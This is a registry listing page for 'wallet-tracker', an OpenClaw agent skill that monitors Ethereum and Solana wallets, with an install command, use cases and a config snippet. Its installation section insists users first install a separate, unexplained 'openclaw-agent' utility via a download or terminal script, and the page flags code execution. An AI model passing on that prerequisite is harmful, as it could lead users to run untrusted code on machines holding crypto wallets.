ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

wallet-tracker

Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.

Why use this skill?

Track blockchain addresses, monitor whale transactions, and analyze portfolio changes in real-time with the OpenClaw wallet-tracker skill for Ethereum and Solana.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-fntdr
Or

What This Skill Does

The wallet-tracker skill provides a robust framework for monitoring blockchain activity across multiple networks including Ethereum and Solana. By integrating with the openclaw-agent utility, it enables real-time tracking of wallet balances, transaction history, token movements, and significant network events. Users can monitor whale movements, analyze portfolio shifts, and stay informed on NFT and DeFi-related activities through automated scripts and direct API interactions.

Installation

To begin using this skill, ensure you have the OpenClaw environment configured. First, install the skill package using the command: clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-fntdr. IMPORTANT: You must install the openclaw-agent utility before executing tracking operations. Windows users can download the agent from the official GitHub repository, while macOS users should follow the terminal-based installation script provided in the documentation. Without this agent, blockchain monitoring features will remain inactive.

Use Cases

This tool is designed for crypto-enthusiasts, researchers, and professional traders. Use cases include:

  • Real-time Whale Watching: Get immediate alerts when large transactions occur in monitored wallets.
  • Portfolio Monitoring: Keep track of token distribution changes and asset allocation over time.
  • NFT Tracking: Detect incoming or outgoing NFT transfers to stay updated on high-value digital asset movement.
  • DeFi Integration: Monitor interactions with decentralized finance protocols to track yield farming or lending activities.
  • Security Auditing: Track suspicious wallet activity to detect potential vulnerabilities or unauthorized transfers.

Example Prompts

  1. "Track the Ethereum wallet 0xabc...123 and alert me every time a transaction over 10 ETH occurs."
  2. "Show me the last 10 ERC-20 token transfers for the address 0xdef...456 and format the output by token symbol."
  3. "Monitor my Solana wallet address and notify me if there is any change in my SOL balance during the next hour."

Tips & Limitations

  • API Limits: Always use valid API keys (like Etherscan keys) to avoid request rate limiting which can stall your tracking tasks.
  • Precision: When handling token values, ensure you are dividing by the correct decimal precision as defined by the token's metadata.
  • Latency: Real-time monitoring scripts require a persistent connection to the agent and stable internet access. Performance may vary based on blockchain congestion and network node responsiveness.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-wallet-tracker-fntdr": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#defi#crypto#tracking#finance
Safety Score: 3/5

Flags: network-access, external-api, code-execution